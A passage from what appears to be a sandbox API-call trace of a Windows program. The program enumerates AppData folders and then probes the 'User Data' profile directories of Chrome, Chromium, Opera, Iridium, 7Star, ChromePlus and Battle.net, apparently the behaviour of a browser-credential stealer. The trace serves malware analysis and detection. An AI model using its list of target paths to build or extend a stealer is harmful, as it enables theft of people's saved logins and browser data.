ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.312] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0208.313] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.313] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x39 [0208.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0208.313] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x39 [0208.314] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0208.316] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0208.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0208.316] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0208.317] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.317] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.317] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0208.318] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0208.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef84) returned 1 [0208.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef30) returned 1 [0208.318] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x38ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0208.318] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x38ece0 | out: lpFindFileData=0x38ece0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.319] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.319] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0208.319] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eca0) returned 1 [0208.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef00) returned 1 [0208.319] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0208.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0208.320] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0208.320] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.320] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.320] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YaAddon", cAlternateFileName="")) returned 1 [0208.321] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YaAddon", cAlternateFileName="")) returned 0 [0208.321] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0208.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef84) returned 1 [0208.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef30) returned 1 [0208.321] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x38ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0208.321] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\*", lpFindFileData=0x38ece0 | out: lpFindFileData=0x38ece0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.322] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.322] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YaAddon", cAlternateFileName="")) returned 1 [0208.322] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.322] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eca0) returned 1 [0208.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef00) returned 1 [0208.323] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0208.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.324] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0208.324] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.325] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.325] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0208.326] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.513] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.513] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net") returned 0x2c [0208.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.514] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2b [0208.514] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.642] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.642] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data") returned 0x34 [0208.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.642] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x33 [0208.643] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.645] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.645] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x39 [0208.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.645] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x38 [0208.645] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.647] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.648] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x3e [0208.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.648] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x3d [0208.648] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.650] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.650] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\") returned 0x33 [0208.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.650] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x32 [0208.650] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.652] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.652] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x42 [0208.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.653] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x41 [0208.653] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.655] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.655] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data") returned 0x33 [0208.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.655] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x32 [0208.655] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.657] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.657] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x37 [0208.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.657] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: 